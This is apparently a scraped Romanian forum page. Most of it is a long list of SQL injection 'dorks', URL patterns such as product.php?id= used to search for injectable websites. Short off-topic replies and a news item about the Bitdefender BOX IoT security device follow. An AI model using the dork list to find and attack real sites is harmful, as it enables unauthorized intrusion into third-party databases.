view_author.php?id= main.php?id= english/fonction/print.php?id= magazines/adult_magazine_single_page.php?magid= product_details.php?prodid= magazines/adult_magazine_full_year.php?magid= products/card.php?prodID= catalog/product.php?cat_id= e_board/modifyform.html?code= community/calendar-event-fr.php?id= products.php?p= news.php?id= view/7/9628/1.html?reply= product_details.php?prodid= catalog/product.php?pid= rating.php?id= ?page= catalog/main.php?cat_id= index.php?page= detail.php?prodid= products/product.php?pid= news.php?id= book_detail.php?BookID= catalog/main.php?cat_id= catalog/main.php?cat_id= default.php?cPath= catalog/main.php?cat_id= catalog/main.php?cat_id= category.php?catid= categories.php?cat= categories.php?cat= detail.php?prodID= detail.php?id= category.php?id= hm/inside.php?id= index.php?area_id= gallery.php?id= products.php?cat= products.php?cat= media/pr.php?id= books/book.php?proj_nr= products/card.php?prodID= general.php?id= news.php?t= usb/devices/showdev.php?id= content/detail.php?id= templet.php?acticle_id= news/news/title_show.php?id= product.php?id= index.php?url= cryolab/content.php?cid= ls.php?id= s.php?w= abroad/page.php?cid= bayer/dtnews.php?id= news/temp.php?id= index.php?url= book/bookcover.php?bookid= index.php/en/component/pvm/?view= product/list.php?pid= cats.php?cat= software_categories.php?cat_id= print.php?sid= docDetail.aspx?chnum= index.php?section= index.php?page= index.php?page= en/publications.php?id= events/detail.php?ID= forum/profile.php?id= media/pr.php?id= content.php?ID= cloudbank/detail.php?ID= pages.php?id= news.php?id= beitrag_D.php?id= content/index.php?id= index.php?i= ?action= index.php?page= beitrag_F.php?id= index.php?pageid= page.php?modul= detail.php?id= index.php?w= index.php?modus= news.php?id= news.php?id= aktuelles/meldungen-detail.php?id= item.php?id= obio/detail.php?id= page/de/produkte/produkte.php?prodID= packages_display.php?ref= shop/index.php?cPath= modules.php?bookid= product-range.php?rangeID= en/news/fullnews.php?newsid= deal_coupon.php?cat_id= show.php?id= blog/index.php?idBlog= redaktion/whiteteeth/detail.php?nr= HistoryStore/pages/item.php?itemID= aktuelles/veranstaltungen/detail.php?id= tecdaten/showdetail.php?prodid= ?id= rating/stat.php?id= content.php?id= viewapp.php?id= item.php?id= news/newsitem.php?newsID= FernandFaerie/index.php?c= show.php?id= ?cat= categories.php?cat= category.php?c= product_info.php?id= prod.php?cat= store/product.php?productid= browsepr.php?pr= product-list.php?cid= products.php?cat_id= product.php?ItemID= category.php?c= main.php?id= article.php?id= showproduct.php?productId= view_item.php?item= skunkworks/content.php?id= index.php?id= item_show.php?id= publications.php?Id= index.php?t= view_items.php?id= portafolio/portafolio.php?id= YZboard/view.php?id= index_en.php?ref= index_en.php?ref= category.php?id_category= main.php?id= main.php?id= calendar/event.php?id= default.php?cPath= pages/print.php?id= index.php?pg_t= _news/news.php?id= forum/showProfile.php?id= fr/commande-liste-categorie.php?panier= downloads/shambler.php?id= sinformer/n/imprimer.php?id= More_Details.php?id= directory/contenu.php?id_cat= properties.php?id_cat= forum/showProfile.php?id= downloads/category.php?c= index.php?cat= product_info.php?products_id= product_info.php?products_id= product-list.php?category_id= detail.php?siteid= projects/event.php?id= view_items.php?id= more_details.php?id= melbourne_details.php?id= more_details.php?id= detail.php?id= more_details.php?id= home.php?cat= idlechat/message.php?id= detail.php?id= print.php?sid= more_details.php?id= default.php?cPath= events/event.php?id= brand.php?id= toynbeestudios/content.php?id= show-book.php?id= more_details.php?id= store/default.php?cPath= property.php?id= product_details.php?id= more_details.php?id= view-event.php?id= content.php?id= book.php?id= page/venue.php?id= print.php?sid= colourpointeducational/more_details.php?id= print.php?sid= browse/book.php?journalID= section.php?section= bookDetails.php?id= profiles/profile.php?profileid= event.php?id= gallery.php?id= category.php?CID= corporate/newsreleases_more.php?id= print.php?id= view_items.php?id= more_details.php?id= county-facts/diary/vcsgen.php?id= idlechat/message.php?id= podcast/item.php?pid= products.php?act= details.php?prodId= socsci/events/full_details.php?id= ourblog.php?categoryid= mall/more.php?ProdID= archive/get.php?message_id= review/review_form.php?item_id= english/publicproducts.php?groupid= news_and_notices.php?news_id= rounds-detail.php?id= gig.php?id= board/view.php?no= index.php?modus= news_item.php?id= rss.php?cat= products/product.php?id= details.php?ProdID= els_/product/product.php?id= store/description.php?iddesc= socsci/news_items/full_story.php?id= modules/forum/index.php?topic_id= feature.php?id= products/Blitzball.htm?id= profile_print.php?id= questions.php?questionid= html/scoutnew.php?prodid= main/index.php?action= ********.php?cid= ********.php?cid= news.php?type= index.php?page= viewthread.php?tid= summary.php?PID= news/latest_news.php?cat_id= index.php?cPath= category.php?CID= index.php?pid= more_details.php?id= specials.php?osCsid= search/display.php?BookID= articles.php?id= print.php?sid= page.php?id= more_details.php?id= newsite/pdf_show.php?id= shop/category.php?cat_id= shopcafe-shop-product.php?bookId= shop/books_detail.php?bookID= index.php?cPath= more_details.php?id= news.php?id= more_details.php?id= shop/books_detail.php?bookID= more_details.php?id= blog.php?blog= index.php?pid= prodotti.php?id_cat= category.php?CID= more_details.php?id= poem_list.php?bookID= more_details.php?id= content.php?categoryId= authorDetails.php?bookID= press_release.php?id= item_list.php?cat_id= colourpointeducational/more_details.php?id= index.php?pid= download.php?id= shop/category.php?cat_id= i-know/content.php?page= store/index.php?cat_id= yacht_search/yacht_view.php?pid= pharmaxim/category.php?cid= print.php?sid= specials.php?osCsid= store.php?cat_id= category.php?cid= displayrange.php?rangeid= product.php?id= csc/news-details.php?cat= products-display-details.php?prodid= stockists_list.php?area_id= news/newsitem.php?newsID= index.php?pid= newsitem.php?newsid= category.php?id= news/newsitem.php?newsID= details.php?prodId= publications/publication.php?id= purelydiamond/products/category.php?cat= category.php?cid= product/detail.php?id= news/newsitem.php?newsID= details.php?prodID= item.php?item_id= edition.php?area_id= page.php?area_id= view_newsletter.php?id= library.php?cat= categories.php?cat= page.php?area_id= categories.php?cat= publications.php?id= item.php?sub_id= page.php?area_id= page.php?area_id= category.php?catid= content.php?cID= newsitem.php?newsid= frontend/category.php?id_category= news/newsitem.php?newsID= things-to-do/detail.php?id= page.php?area_id= page.php?area_id= listing.php?cat= item.php?iid= customer/home.php?cat= staff/publications.php?sn= news/newsitem.php?newsID= library.php?cat= main/index.php?uid= library.php?cat= shop/eventshop/product_detail.php?itemid= news/newsitem.php?newsID= news/newsitem.php?newsID= library.php?cat= FullStory.php?Id= publications.php?ID= publications/book_reviews/full_review.php?id= newsitem.php?newsID= newsItem.php?newsId= site/en/list_service.php?cat= page.php?area_id= product.php?ProductID= releases_headlines_details.php?id= product.php?shopprodid= product.php?productid= product.php?product= product.php?product_id= productlist.php?id= product.php?shopprodid= garden_equipment/pest-weed-control/product.php?pr= product.php?shopprodid= browsepr.php?pr= productlist.php?id= kshop/product.php?productid= product.php?pid= showproduct.php?prodid= product.php?productid= productlist.php?id= index.php?pageId= productlist.php?tid= product-list.php?id= onlinesales/product.php?product_id= garden_equipment/Fruit-Cage/product.php?pr= product.php?shopprodid= product_info.php?products_id= productlist.php?tid= showsub.php?id= productlist.php?fid= products.php?cat= products.php?cat= product-list.php?id= product.php?sku= store/product.php?productid= products.php?cat= productList.php?cat= product_detail.php?product_id= product.php?pid= wiki/pmwiki.php?page****= summary.php?PID= productlist.php?grpid= cart/product.php?productid= db/CART/product_details.php?product_id= ProductList.php?id= products/product.php?id= product.php?shopprodid= product_info.php?products_id= product_ranges_view.php?ID= cei/cedb/projdetail.php?projID= products.php?DepartmentID= product.php?shopprodid= product.php?shopprodid= product_info.php?products_id= index.php?news= education/content.php?page= Interior/productlist.php?id= products.php?categoryID= modules.php?****= message/comment_threads.php?postID= artist_art.php?id= products.php?cat= index.php?option= ov_tv.php?item= index.php?lang= showproduct.php?cat= index.php?lang= product.php?bid= product.php?bid= cps/rde/xchg/tm/hs.xsl/liens_detail.html?lnkId= item_show.php?lid= ?pagerequested= downloads.php?id= print.php?sid= print.php?sid= product.php?intProductID= productList.php?id= product.php?intProductID= more_details.php?id= more_details.php?id= books.php?id= index.php?offs= mboard/replies.php?parent_id= Computer Science.php?id= news.php?id= pdf_post.php?ID= reviews.php?id= art.php?id= prod.php?cat= event_info.php?p= view_items.php?id= home.php?cat= item_book.php?CAT= www/index.php?page= schule/termine.php?view= goods_detail.php?data= storemanager/contents/item.php?page_code= view_items.php?id= customer/board.htm?mode= help/com_view.html?code= n_replyboard.php?typeboard= eng_board/view.php?T****= prev_results.php?prodID= bbs/view.php?no= gnu/?doc= zb/view.php?uid= global/product/product.php?gubun= m_view.php?ps_db= naboard/memo.php?bd= bookmark/mybook/bookmark.php?bookPageNo= board/board.html?table= kboard/kboard.php?board= order.asp?lotid= english/board/view****.php?code= goboard/front/board_view.php?code= bbs/bbsView.php?id= boardView.php?bbs= eng/rgboard/view.php?&bbs_id= product/product.php?cate= content.php?p= page.php?module= ?pid= bookpage.php?id= view_items.php?id= index.php?pagina= product.php?prodid= notify/notify_form.php?topic_id= php/index.php?id= content.php?cid= product.php?product_id= constructies/product.php?id= detail.php?id= php/index.php?id= index.php?section= product.php?****= show_bug.cgi?id= detail.php?id= bookpage.php?id= product.php?id= today.php?eventid= main.php?item= index.php?cPath= news.php?id= event.php?id= print.php?sid= news/news.php?id= module/range/dutch_windmill_collection.php?rangeId= print.php?sid= show_bug.cgi?id= product_details.php?product_id= products.php?groupid= projdetails.php?id= product.php?productid= products.php?catid= product.php?product_id= product.php?prodid= product.php?prodid= newsitem.php?newsID= newsitem.php?newsid= profile.php?id= ********s_in_area.php?area_id= productlist.php?id= productsview.php?proid= rss.php?cat= pub/pds/pds_view.php?start= products.php?rub= ogloszenia/rss.php?cat= print.php?sid= product.php?id= print.php?sid= magazin.php?cid= galerie.php?cid= www/index.php?page= view.php?id= content.php?id= board/read.php?tid= product.php?id_h= news.php?id= index.php?book= products.php?act= reply.php?id= stat.php?id= products.php?cat_id= free_board/board_view.html?page= item.php?id= view_items.php?id= main.php?prodID= gb/comment.php?gb_id= gb/comment.php?gb_id= classifieds/showproduct.php?product= view.php?pageNum_rscomp= cart/addToCart.php?cid= content/pages/index.php?id_cat= content.php?id= display.php?ID= display.php?ID= ponuky/item_show.php?ID= default.php?cPath= main/magpreview.php?id= ***zine/board.php?board= content.php?arti_id= mall/more.php?ProdID= product.php?cat= news.php?id= content/view.php?id= content.php?id= index.php?action= board_view.php?s_board_id= KM/BOARD/readboard.php?id= board_view.html?id= content.php?cont_title= category.php?catid= mall/more.php?ProdID= publications.php?id= irbeautina/product_detail.php?product_id= print.php?sid= index_en.php?id= bid/topic.php?TopicID= news_content.php?CategoryID= front/bin/forumview.phtml?bbcode= cat.php?cat_id= stat.php?id= veranstaltungen/detail.php?id= more_details.php?id= english/print.php?id= print.php?id= view_item.php?id= content/conference_register.php?ID= rss/event.php?id= event.php?id= main.php?id= rtfe.php?siteid= category.php?cid= classifieds/detail.php?siteid= tools/print.php?id= channel/channel-layout.php?objId= content.php?id= resources/detail.php?id= more_details.php?id= detail.php?id= view_items.php?id= content/programme.php?ID= book.php?id= php/fid985C124FBD9EF3A29BA8F40521F12D097B0E2016.aspx?s = detail.php?id= default.php?cPath= more_details.php?id= php/fid8E1BED06B1301BAE3ED64383D5F619E3B1997A70.aspx?s = content.php?id= view_items.php?id= default.php?cPath= book.php?id= view_items.php?id= products/parts/detail.php?id= category.php?cid= book.html?isbn= view_item.php?id= picgallery/category.php?cid= detail.php?id= print.php?sid= displayArticleB.php?id= knowledge_base/detail.php?id= bpac/calendar/event.php?id= mb_showtopic.php?topic_id= pages.php?id= content.php?id= exhibition_overview.php?id= singer/detail.php?siteid= Category.php?cid= detail.php?id= print.php?sid= category.php?cid= more_detail.php?X_EID= book.php?ISBN= view_items.php?id= category.php?cid= htmlpage.php?id= story.php?id= tools/print.php?id= print.php?sid= php/event.php?id= print.php?sid= articlecategory.php?id= print.php?sid= ibp.php?ISBN= club.php?cid= view_items.php?id= aboutchiangmai/details.php?id= view_items.php?id= book.php?isbn= blog_detail.php?id= event.php?id= default.php?cPath= product_info.php?products_id= shop_display_products.php?cat_id= print.php?sid= modules/content/index.php?id= printcards.php?ID= events/event.php?ID= more_details.php?id= default.php?TID= general.php?id= detail.php?id= event.php?id= referral/detail.php?siteid= view_items.php?id= event.php?id= view_items.php?id= category.php?id= cemetery.php?id= index.php?cid= content.php?id= exhibitions/detail.php?id= bookview.php?id= edatabase/home.php?cat= view_items.php?id= store/view_items.php?id= print.php?sid= events/event_detail.php?id= view_items.php?id= detail.php?id= pages/video.php?id= about_us.php?id= recipe/category.php?cid= view_item.php?id= en/main.php?id= print.php?sid= More_Details.php?id= category.php?cid= home.php?cat= article.php?id= page.php?id= print-story.php?id= psychology/people/detail.php?id= print.php?sid= print.php?ID= article_preview.php?id= Pages/whichArticle.php?id= view_items.php?id= Sales/view_item.php?id= book.php?isbn= knowledge_base/detail.php?id= gallery/gallery.php?id= event.php?id= detail.php?id= store/home.php?cat= view_items.php?id= detail.php?ID= event_details.php?id= detailedbook.php?isbn= fatcat/home.php?view= events/index.php?id= static.php?id= answer/default.php?pollID= news/detail.php?id= view_items.php?id= events/unique_event.php?ID= gallery/detail.php?ID= print.php?sid= view_items.php?id= board/showthread.php?t= book.php?id= event.php?id= more_detail.php?id= knowledge_base/detail.php?id= html/print.php?sid= index.php?id= content.php?ID= Shop/home.php?cat= store/home.php?cat= print.php?sid= gallery.php?id= resources/index.php?cat= events/event.php?id= view_items.php?id= default.php?cPath= content.php?id= products/products.php?p= auction/item.php?id= products.php?cat= clan_page.php?cid= product.php?sku= item.php?id= events?id= comments.php?id= products/?catID= modules.php?****= fshstatistic/index.php?PID= products/products.php?p= sport.php?revista= products.php?p= products.php?openparent= home.php?cat= news/shownewsarticle.php?articleid= discussions/10/9/?CategoryID= trailer.php?id= news.php?id= ?page= index.php?page= item/detail.php?num= features/view.php?id= site/?details&prodid= product_info.php?products_id= remixer.php?id= proddetails_print.php?prodid= pylones/item.php?item= index.php?cont= product.php?ItemId= video.php?id= detail.php?item_id= filemanager.php?delete= news/newsletter.php?id= shop/home.php?cat= designcenter/item.php?id= board/kboard.php?board= index.php?id= board/view_temp.php?table= magazine-details.php?magid= thread.php/id= index.php?y= products.php?sub= products.html?file= xcart/home.php?cat= event.php?contentID= forum/showthread.php?p= model.php?item= product_details.php?prodid= kboard/kboard.php?board= english/index.php?id= products.php?req= search.php?q= products.php?openparent= product.php?id= content.php?op= event_listings_short.php?s= stat.php?id= print.php?id= tutorial.php?articleid= product.php?product= content/view.php?id= phorum/read.php?3,716,721,quote= php/fidEAD6DDC6CC9D1ADDFD7876B7715A3342E18A865C.aspx?s = suffering/newssummpopup.php?newscode= kr/product/product.php?gubun= content.php?nID= search***.php?ki= nightlife/martini.php?cid= detail.php?id= discussions/9/6/?CategoryID= seWork.aspx?WORKID= modules.php?****= products.php?cat= products.php?p= cheats/item.php?itemid= index.php?main= modules/xfmod/forum/forum.php?thread_id= downloads.php?type= club.php?cid= content.php?id= forums/search.php?do= mlx/slip_about_sharebacks.php?item= category.php?categoryid= nasar/news.php?id= news.php?id= show.php?item= rmcs/opencomic.phtml?rowid= products.php?cid= index.php?url= showmedia.php?id= lit_work.php?w_id= site_list.php?sort= home.php?cat= joblog/index.php?mode= eng/board/view.php?id= item.php?id= index.php?m= detail.php?id= goods_detail.php?goodsIdx= index.php?str= episode.php?id= link.php?type= resources/detail.php?id= display-product.php?Product= main/viewItem.php?itemid= item.php?iid= index.php?list= products.php?p= subcat.php?catID= htm/item_cat.php?item_id= addcolumn.php?id= cats.php?cat= cats.php?cat= ?page= modules/content/index.php?id= detail.php?cat_id= site/?details&prodid= product.php?lang= modules/wfdownloads/singlefile.php?cid= details.php?prodid= myResources_noBanner.php?categoryID= product.php?id= ppads/external.php?type= store/product.php?productid= detail.php?id= prod_details.php?products_id= board/templete/sycho/input.php?table= cats.php?cat= product/product.php?product_no= search.php?q= record_profile.php?id= index.php?y= view.php?v_id= awards/index.php?input1= jobsite_storage_equipment/view_products.php?p_id= rural/rss.php?cat= calendar.php?event_id= eshop.php?id= content.php?ID= addimage.php?cid= category.php?cid= artist_info.php?artistId= forum/viewtopic.php?TopicID= browse.php?cid= editProduct.php?cid= main/index.php?uid= tutorials/view.php?id= products.php?p= index.php?size= pylones/item.php?item= categories.php?start= portfolio.html?categoryid= forums/showthread.php?t= item.php?code= products.php?cat= TopResources.php?CategoryID= opinion.php?option= modify_en.htm?mode= events/detail.php?id= cart/prod_details.php?prodid= html/home/products/product.php?pid= product.php?product_no= auction/item.php?id= cms/showpage.php?cid= touchy/home.php?cat= products.php?sku= fcms/view.php?cid= newsletter/newsletter.php?letter= campkc-view-event.php?Item_ID= forums/index.php?page= products.php?session= view_event.php?eid= product.php?pcid= db/item.html?item= item.php?item_id= order-now.php?prodid= product.php?id= store_prod_details.php?ProdID= products.php?sku= news.php?item= news.php?id= cart/prod_details.php?prodid= products/products.php?p= category.php?cid= specials.php?osCsid= infusions/book_panel/books.php?bookid= special_offers/more_details.php?id= book.php?id= journal.php?id= category.php?cid= News/press_release.php?id= pages/index.php?pID= exclusive.php?pID= shop/pages.php?page= index.php?cPath= shop/index.php?cat_id= artistdetail.php?ID= products_connections_detail.php?cat_id= php/fid27BF3BCB1A648805B511298CE6D643E72B4D59AD.aspx?s = reviews/more_details.php?id= press_release.php?id= product.php?rangeid= knowledgebase/article.php?id= store/index.php?cat_id= news.php?cat_id= Products/products.php?showonly= eng/store/show_scat.php?cat_id= search/index.php?q= news/press_release.php?id= html/print.php?sid= aggregator.php?id= news/shownews.php?article= default.php?cPath= press_release.php?id= book.php?bookid= cubecart/index.php?cat_id= classified/detail.php?siteid= cart/item_show.php?itemID= theater-show.php?id= cube/index.php?cat_id= preorder.php?bookID= category.php?cid= category.php?cat_id= eventsdetail.php?pid= forum/index.php?topic= print.php?sid= article.php?id= html/products.php?id= print.php?sid= read.php?in= index.php?cat_id= top/store.php?cat_id= hearst_journalism/press_release.php?id= press_release.php?id= shop/category.php?cat_id= projectdisplay.php?pid= FREE/poll.php?pid= onlineshop/productView.php?rangeId= more_details.php?id= ********.php?pid= catalog/index.php?cPath= page.php?id= index.php?cPath= article_full.php?id= hearst_journalism/press_release.php?id= dump.php?bd_id= Category.php?cid= products.php?cat= store/products.php?cat_id= product.php?cat_id= v/showthread.php?t= melbourne_details.php?id= stdetail.php?prodID= **********/fid17013034EFB2509745A39CD861F4FEA3E716FBE5.aspx?s = print.php?sid= press_release/release_detail.php?id= shop/shop.php?id= news/v.php?id= education.php?id_cat= store/store.php?cat_id= forums/showthread.php?t= news.php?id= events/event-detail.cfm?intNewsEventsID= article.php?id= viewmedia.php?prmMID= magdetail.php?magid= cemetery.php?id= index.php?id_cat= shop/index.php?cPath= view_songs.php?cat_id= shop/products.php?p= shop/index.php?cat_id= tourism/details.php?id= catalog/index.php?cPath= ViewPodcast.php?id= profile.php?objID= item_show.php?itemID= press_releases/press_releases.php?id= print.php?sid= gallery/categoria.php?id_cat= obj/print.php?objId= print.php?sid= nuell/item_show.php?itemID= products/products.php?p= products/item_show.php?itemId= view_ratings.php?cid= press_releases.php?id= main/content.php?id= shop/index.php?cat_id= book.html?isbn= shop/products.php?cat_id= kshop/home.php?cat= section.php?section= bearstore/store.php?cat_id= page_prod.php?id_cat= default.php?cPath= news.php?category= products/product.php?pid= print.php?sid= print.php?sid= show_bug.cgi?id= news.php?articleID= search/index.php?q= bookSingle.php?bookId= weekly/story.php?story_id= index.php?cPath= catalog/index.php?cPath= more_details.php?id= press_release.php?id= store/showcat.php?cat_id= m/content/article.php?content_id= article.php?id= viewstore.php?cat_id= shop.php?id_cat= news/press-announcements/press_release.php?press_id= publication/ontarget_details.php?oid= product_details.php?prodID= print.php?sid= specials.php?osCsid= category_view.php?category_id= book_dete.php?bookID= index.php?cPath= events.php?pid= articles/index.php?id= category.php?cat_id= html/products_cat.php?cat_id= more_details.php?id= preview.php?pid= product.php?productid= Product.php?Showproduct= bbs/view.php?tbl= news.php?id= details/food.php?cid= products.php?cat= calendar/week.php?cid= print.php?id= itemlist.php?categoryID= fshstatistic/index.php?&PID= press_release/release_detail.php?id= product.php?prod_num= products.php?page= con_product.php?prodid= mp-prt.php?item= notice/notice_****.php?id= showproducts.php?cid= site/?details&prodid= downloads.php?file_id= products.php?cat_id= product.php?c= campkc-today.php?Start= index.php?page= detail.php?id= shop/product.php?id= classifieds/showproduct.php?product= product-details.php?prodID= gallery/gallery.php?id= adetail.php?id= home.php?cat= store/item.php?id= products.php?cat= detail.php?prodid= links.php?cat= detail.php?prodid= videos/view.php?id= resources/index.php?cat= dream_interpretation.php?id= category.php?category_id= html/gallery.php?id= item.php?id= category.php?ID= knowledge_base/detail.php?id= home.php?cat= gallery.php?id= category.php?c= index.php?area_id= games/play.php?id= tutorial.php?articleid= directory/showcat.php?cat= gallery/gallery.php?id= news/newsitem.php?newsID= site/public/newsitem.php?newsID= index.php?cat= newsitem.php?newsID= category.php?catid= gallery.php?id= content.php?id= resources/category.php?CatID= media.php?****= store/detail.php?prodid= display_page.php?tpl= calendar/item.php?id= item-menu.php?idSubCat= Blog/viewpost.php?id= news/newsitem.php?newsID= detail.php?prodid= printarticle.php?id= article.php?id= category.php?id= page.php?id= detail.php?prodid= links/resources/links_search_result.php?catid= news_view.php?id= item.php?id= display_page.php?elementId= photog.php?id= home.php?cat= categories.php?catid= categories.php?parent_id= index.php?product= category.php?catId= cm/public/news/news.php?newsid= content.php?page= volunteers/item.php?id= ressource.php?ID= extensions/extlist.php?cat= category.php?id= cms/publications.php?id= page.php?id= offer_info.php?id= cart/detail_prod.php?id= directory.php?cat= Shop/home.php?cat= categories.php?cat= newsitem.php?newsid= shareit/readreviews.php?cat= categories.php?cat= item.php?sub_id= index.php?area_id= category.php?catid= item.php?sub_id= index.php?area_id= now_viewing.php?id= categories.php?cat= publications/?id= carry-detail.php?prodID= tools/tools_cat.php?c= detail.php?prodid= gallery/mailmanager/subscribe.php?ID= painting.php?id= Catalog_View_Summary.php?ID= categories.php?parent_id= product-detail.php?prodid= newsitem.php?newsid= liblog/index.php?cat= cart/prod_subcat.php?id= goto.php?area_id= catalog.php?CAT= showthread.php?t= category.php?id= item.php?item= site/cat.php?setlang= item.php?id= videos/view.php?id= item.php?SKU= display_page.php?id= index.php?id= faq/category.php?id= news/newsitem.php?newsid= cat.php?cat= review.php?id= knowledgebase/article.php?id= forums/showthread.php?t= product_info.php?products_id= cart/home.php?cat= item.php?id= board/viewtopic.php?id= page.php?id= english/gallery.php?id= detail.php?prodid= detail.php?prodid= item.php?item_id= article.php?ID= categories.php?cat= media.php?****= home.php?cat= gallery/gallery.php?id= library.php?author= item.php?cat= cart/home.php?cat= vb/showthread.php?p= news-item.php?id= ads/index.php?cat= item.php?code= kids-detail.php?prodID= index.php?id= category.php?id= addsiteform.php?catid= categories.php?cat= newshop/category.php?c= news/news-item.php?id= product.php?proid= catalog/product_info.php?products_id= products.php?cat= product.php?productid= browsepr.php?pr= products.php?cat= productDetail.php?prodId= productDetail.php?prodId= product.php?products_id= product.php?productid= browsepr.php?pr= product.php?ProductID= product-details.php?prodId= product_details.php?prodid= product_info.php?products_id= product.php?id= browsepr.php?pr= products.php?cat= product_details.php?product_id= products.php?cat= product.php?proid= productlist.php?tid= products.php?cat= product_details.php?product_id= products/product.php?article= products.php?cid= forums/showthread.php?t= show_prod.php?p= new/showproduct.php?prodid= product.php?productid= prod.php?Cat= productlist.php?fid= product.php?pl= product.php?proID= product_details.php?product_id= PCMA/productDetail.php?prodId= product.php?proid= panditonline/productlist.php?id= productlist.php?id= js_product_detail.php?pid= prod.php?cat= poem.php?id= estore/products.php?cat= summary.php?PID= productdetails.php?prodId= product-details.php?prodID= en/product.php?proid= product-list.php?ID= main/product.php?productid= product.php?product= site/catalog.php?cid= resources/index.php?cat= SearchProduct/ListProduct.php?PClassify_3_SN= Products/product.php?pid= clear/store/products.php?product_category= earth/visitwcm_view.php?id= products.php?categoryID= product.php?productid= products/products.php?cat= product.php?pid= product.php?proid= home.php?cat= html/projdetail.php?id= products/index.php?cat= productDetails.php?prodId= proddetail.php?prod= product.php?productid= products.php?subgroupid= product_info.php?products_id= prod.php?cat= product_detail.php?prodid= discont_productpg.php?product_id= giftshop/product.php?proid= products.php?cat= product.php?product_id= shop/products.php?cat= product_info.php?products_id= products.php?cat= SearchProduct/ListProduct.php?PClassify_3_SN= productlist.php?id= products.php?cat= product_customed.php?pid= products.php?cat= productlist.php?id= product.php?id= materials/item_detail.php?ProductID= products/productdetails.php?prodID= product_details.php?product_id= products.php?cat= projDetail.php?id= main/product.php?productid= product_details.php?product_id= product.php?proid= ProductDetails.php?ProdID= store/product.php?productid= x/product.php?productid= product.php?productid= product.php?id= iam/tabbedWithShowcase.php?pid= reviews/index.php?cat= product.php?productid= product.php?pid= product.php?proid= mhp/my***.php?hls= xcart/product.php?productid= products.php?cat= xcart/product.php?productid= productlist.php?id= product_info.php?products_id= productlist.php?cat= prodrev.php?cat= productlist.php?id= projdetail.php?id= store/customer/product.php?productid= product.php?product_id= product.php?productid= products.php?cat= cats_disp.php?cat= product.php?product_id= productdetails.php?prodid= product_details.php?product_id= product_details.php?product_id= product.php?id= productlist.php?tid= ddoecom/product.php?proid= proddetail.php?prod= productlist.php?fid= products.php?cat= Products/Catsub.php?recordID= Products/mfr.php?mfg= site/catalog.php?pid= shop/product_details.php?ProdID= usar/productDetail.php?prodID= products/display_product.php?product_id= products.php?cat= cardIssuance/product.php?pid= product.php?proid= products.php?parent= products.php?catId= productDetail.php?prodID= productlist.php?fid= products.php?mainID= products.php?cat= product_info.php?products_id= product_detail.php?prodid= catalog/product_info.php?products_id= product_info.php?products_id= products.php?cat= product.search.php?proid= productlist.php?id= product.php?proid= product.php?pid= product_reviews.php?feature_id= product.php?product_id= product.php?productid= item.php?id= directorylisting.php?cat= historical/st Link: Massive List of SQL Dorks - Pastebin.com
-
@Wired exista deja buton pentru asta revin cu poze ultimul buton apesi o data pe el si se face asa cam asta e tot. verifica si tu inainte sa faci topicuri aiurea...
-
@rom3ocrash inteleg nu e problema. si nu te supara fiindca esti atacat
-
Bitdefender Box tine virusii la distanta de gadgeturile parte din Internet of Things. Bitdefender a lansat, deocamdata in SUA, un produs unic, menit sa ofere securitate informatica dispozitivelor de orice tip conectate la Internet. Bitdefender Box va proteja nu doar calculatoarele, telefoanele si tabletele, ci si smart TV-urile, frigiderele inteligent, sistemele de iluminat sau sistemele de alarma conectate la Wi-Fi. Este o solutie antivirus atat software, cat si hardware, care va putea fi precomandata de americani de la mijlocul lunii decembrie, urmand ca produsul sa ajunga la utilizatori in ianuarie. Cei de la Bitdefender nu ataca deocamdata piata din Romania, deoarece aici numarul electrocasnicelor cu conexiune la internet este redus. Cu aceasta cutie pe care o pui in casa, o conectezi la Internet, si nu-ti mai faci griji in privinta virusilor, romanii sunt primii din primul jucator din industrie care creeaza o solutie completa impotriva amenintarilor informatice pentru Internet of Things. Lansarea oficiala a Bitdefender BOX va avea loc la sfarsitul lui ianuarie, in Statele Unite ale Americii. Planul de lansare include dupa piata americana, dar si cateva piete din Europa de Vest. Bitdefender BOX este un mix ingenios de hardware si software, prezentat intr-o carcasa cu un design minimalist, care ofera un nivel de protectie inovator pentru toate lucrurile si persoanele care trec pragul unei case. Gradul complex de protectie la nivel de retea previne orice tip de amenintare chiar dinainte de a ajunge pe dispozitivele inteligente care ne inconjoara acasa. Totodata, Bitdefender BOX este dotat si cu tehnologii anti-furt, care previn pierderea sau furtul dispozitvelor, dar si functii de tune-up, care optimizeaza si actualizeaza sistemele de operare pentru a asigura o functionare cat mai buna. Source Eu unul abia astept sa se lanseze si la noi.